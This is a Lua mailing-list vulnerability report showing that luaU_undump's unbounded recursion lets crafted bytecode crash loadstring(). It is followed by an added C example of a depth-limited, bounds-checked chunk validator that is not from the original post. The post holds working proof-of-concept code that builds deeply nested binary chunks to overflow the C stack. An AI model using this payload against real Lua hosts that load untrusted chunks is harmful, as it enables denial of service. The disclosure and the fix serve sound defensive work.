- Subject: Re: Specially crafted binary chunks can cause Lua to crash
- From: "Greg Falcon" <veloso@...>
- Date: Tue, 25 Mar 2008 22:54:18 -0400
So now I'm really suspicious of loadstring() in the face of malicious
input. luaG_checkcode seems like a really difficult thing to get
right, and your examples seem to back that up.
I have a third loadstring() vulnerability to report, on a slightly
different attack vector. luaU_undump recursively parses its input but
does not respect LUAI_MAXCCALLS, so a maliciously crafted input can
blow the C stack.
Below is proof-of-concept code. Apologies for the opaque
implementation; this code only works on standard x86 builds, and
simulates a deeply nested
local function a() local function a() local function a() ... end end end
which the compiler won't allow.
Greg F
-- Lua 5.1 only: the chunk header below is "\27Lua", version \81 (0x51), format 0,
-- then little-endian with 4-byte int/size_t/Instruction and 8-byte double,
-- which is why it only works on standard x86 builds.
function crash(depth)
  -- header plus the outermost "=stdin" function, opened down to the header of its first child
  local init = '\27\76\117\97\81\0\1\4\4\4\8\0\7\0\0\0\61\115\116' ..
    '\100\105\110\0\1\0\0\0\1\0\0\0\0\0\0\2\2\0\0\0\36' ..
    '\0\0\0\30\0\128\0\0\0\0\0\1\0\0\0\0\0\0\0\1\0\0\0' ..
    '\1\0\0\0\0\0\0\2'
  -- body of the innermost function: a single RETURN, no constants or children, then its line info
  local mid = '\1\0\0\0\30\0\128\0\0\0\0\0\0\0\0\0\1\0\0\0\1\0\0\0\0'
  -- trailer closing the remaining levels and the outermost function
  local fin = '\0\0\0\0\0\0\0\2\0\0\0\1\0\0\0\1\0\0\0\1\0\0\0\2\0' ..
    '\0\0\97\0\1\0\0\0\1\0\0\0\0\0\0\0'
  -- opens one more nesting level: CLOSURE + RETURN and one child prototype
  local lch = '\2\0\0\0\36\0\0\0\30\0\128\0\0\0\0\0\1\0\0\0\0\0\0' ..
    '\0\1\0\0\0\1\0\0\0\0\0\0\2'
  -- closes one nesting level: the inner function's empty upvalue list, then the
  -- enclosing function's line info and its "local a" variable record
  local rch = '\0\0\0\0\0\0\0\2\0\0\0\1\0\0\0\1\0\0\0\1\0\0\0\2\0' ..
    '\0\0\97\0\1\0\0\0\1'
  -- every iteration doubles the nesting: 2^depth openers and 2^depth closers
  for i=1,depth do lch,rch = lch..lch,rch..rch end
  -- luaU_undump recurses once per nested prototype with no depth limit, so a
  -- deep enough chunk overruns the C stack before loadstring() can return
  loadstring(init .. lch .. mid .. rch .. fin)
end
-- nesting of 2^i per call; the interpreter dies long before i reaches 25
for i=1,25 do print(i); crash(i) end
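The missing check, as an added example that is not part of the original post and not Lua's own code: a walker over the Lua 5.1 precompiled-chunk layout that the proof of concept above targets, bounding the prototype recursion the way luaU_undump does not. It assumes what the PoC's 12-byte header declares (little-endian; 4-byte int, size_t and Instruction; 8-byte lua_Number). MAX_NESTING is a hypothetical limit chosen for the example (Lua's LUAI_MAXCCALLS defaults to 200), and build_chunk constructs sample input with the same openers-then-closers scheme the PoC uses, so that the check can be exercised without a vulnerable interpreter.

```c
/* Added example, not Lua's code and not the poster's: a depth-bounded walker
 * over the Lua 5.1 precompiled-chunk layout the proof of concept targets. It
 * assumes what the PoC's 12-byte header declares (little-endian; 4-byte int,
 * size_t and Instruction; 8-byte lua_Number). MAX_NESTING is a hypothetical
 * limit chosen here; Lua's LUAI_MAXCCALLS defaults to 200. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define MAX_NESTING 200
enum { ERR_NONE = 0, ERR_TRUNCATED = -1, ERR_TOO_DEEP = -2, ERR_MALFORMED = -3 };
static const uint8_t LUA51_HEADER[12] = { 0x1b, 'L', 'u', 'a', 0x51, 0, 1, 4, 4, 4, 8, 0 };

typedef struct { const uint8_t *p, *end; int depth, max_depth, err; } Reader;

/* Every read goes through need(), so a hostile count can never run past the buffer. */
static int need(Reader *r, size_t n) {
    if (r->err) return 0;
    if ((size_t)(r->end - r->p) < n) { r->err = ERR_TRUNCATED; return 0; }
    return 1;
}
static uint8_t rd_byte(Reader *r) { return need(r, 1) ? *r->p++ : 0; }
static uint32_t rd_u32(Reader *r) {                 /* little-endian int / size_t */
    if (!need(r, 4)) return 0;
    uint32_t v = (uint32_t)r->p[0] | (uint32_t)r->p[1] << 8 | (uint32_t)r->p[2] << 16 | (uint32_t)r->p[3] << 24;
    r->p += 4; return v;
}
static void skip(Reader *r, size_t n) { if (need(r, n)) r->p += n; }
static void rd_string(Reader *r) { skip(r, rd_u32(r)); }   /* length, then bytes incl. NUL */

static void rd_function(Reader *r) {
    if (r->err) return;
    /* The check luaU_undump lacks: bound the recursion before descending. */
    if (++r->depth > MAX_NESTING) { r->err = ERR_TOO_DEEP; return; }
    if (r->depth > r->max_depth) r->max_depth = r->depth;
    rd_string(r);                                   /* source name */
    rd_u32(r); rd_u32(r);                           /* linedefined, lastlinedefined */
    skip(r, 4);                                     /* nups, numparams, is_vararg, maxstacksize */
    skip(r, 4 * (size_t)rd_u32(r));                 /* code: n Instructions */
    uint32_t nk = rd_u32(r);                        /* constants, each tagged by a type byte */
    for (uint32_t i = 0; i < nk && !r->err; i++) {
        switch (rd_byte(r)) {
        case 0: break;                              /* LUA_TNIL */
        case 1: skip(r, 1); break;                  /* LUA_TBOOLEAN */
        case 3: skip(r, 8); break;                  /* LUA_TNUMBER (double) */
        case 4: rd_string(r); break;                /* LUA_TSTRING */
        default: r->err = ERR_MALFORMED; return;
        }
    }
    uint32_t np = rd_u32(r);                        /* nested prototypes: the recursion */
    for (uint32_t i = 0; i < np && !r->err; i++) rd_function(r);
    skip(r, 4 * (size_t)rd_u32(r));                 /* lineinfo */
    uint32_t nl = rd_u32(r);                        /* locvars: name, startpc, endpc */
    for (uint32_t i = 0; i < nl && !r->err; i++) { rd_string(r); rd_u32(r); rd_u32(r); }
    uint32_t nu = rd_u32(r);                        /* upvalue names */
    for (uint32_t i = 0; i < nu && !r->err; i++) rd_string(r);
    r->depth--;
}

/* Returns ERR_NONE and reports the deepest nesting seen, or a negative error code. */
int check_chunk(const uint8_t *buf, size_t len, int *max_depth) {
    Reader r = { buf, buf + len, 0, 0, ERR_NONE };
    if (len < 12 || memcmp(buf, LUA51_HEADER, 12) != 0) return ERR_MALFORMED;
    r.p += 12;
    rd_function(&r);
    if (!r.err && r.p != r.end) r.err = ERR_MALFORMED;    /* trailing bytes */
    if (max_depth) *max_depth = r.max_depth;
    return r.err;
}

/* Constructed sample input: `depth` nested empty functions, emitted as the PoC
 * does it (all openers, then all closers) so the builder itself never recurses. */
typedef struct { uint8_t *buf; size_t len, cap; } Buf;
static void put(Buf *b, const void *src, size_t n) {
    if (b->len + n > b->cap) { b->cap = (b->cap + n) * 2; b->buf = realloc(b->buf, b->cap); }
    memcpy(b->buf + b->len, src, n); b->len += n;
}
static void put_u32(Buf *b, uint32_t v) {
    uint8_t t[4] = { (uint8_t)v, (uint8_t)(v >> 8), (uint8_t)(v >> 16), (uint8_t)(v >> 24) };
    put(b, t, 4);
}
size_t build_chunk(int depth, uint8_t **out) {       /* caller frees *out */
    static const uint8_t ret[4] = { 30, 0, 0x80, 0 };  /* OP_RETURN 0 1 0 */
    static const uint8_t info[4] = { 0, 0, 0, 2 };     /* nups, numparams, is_vararg, maxstacksize */
    Buf b = { NULL, 0, 0 };
    put(&b, LUA51_HEADER, 12);
    for (int i = 0; i < depth; i++) {                  /* opener: one level, down to its proto list */
        put_u32(&b, 0); put_u32(&b, 1); put_u32(&b, 1); put(&b, info, 4);
        put_u32(&b, 1); put(&b, ret, 4); put_u32(&b, 0);
        put_u32(&b, i + 1 < depth ? 1 : 0);
    }
    for (int i = 0; i < depth; i++) {                  /* closer: empty lineinfo, locvars, upvalues */
        put_u32(&b, 0); put_u32(&b, 0); put_u32(&b, 0);
    }
    *out = b.buf;
    return b.len;
}

int main(void) {
    uint8_t *chunk; int deepest;
    size_t n = build_chunk(MAX_NESTING + 1, &chunk);
    int rc = check_chunk(chunk, n, &deepest);          /* expect ERR_TOO_DEEP at level 200 */
    printf("%zu bytes: result %d, stopped at level %d\n", n, rc, deepest);
    free(chunk);
    return rc == ERR_TOO_DEEP ? 0 : 1;
}
```

Two properties matter here. The depth counter turns the unbounded recursion into a bounded error before the C stack is touched, which is the fix the post asks for. Separately, every length and count read from the chunk goes through need(), so the oversized counts that luaG_checkcode is expected to catch cannot run the reader past the buffer either; a hostile chunk yields ERR_TRUNCATED or ERR_MALFORMED, never a crash.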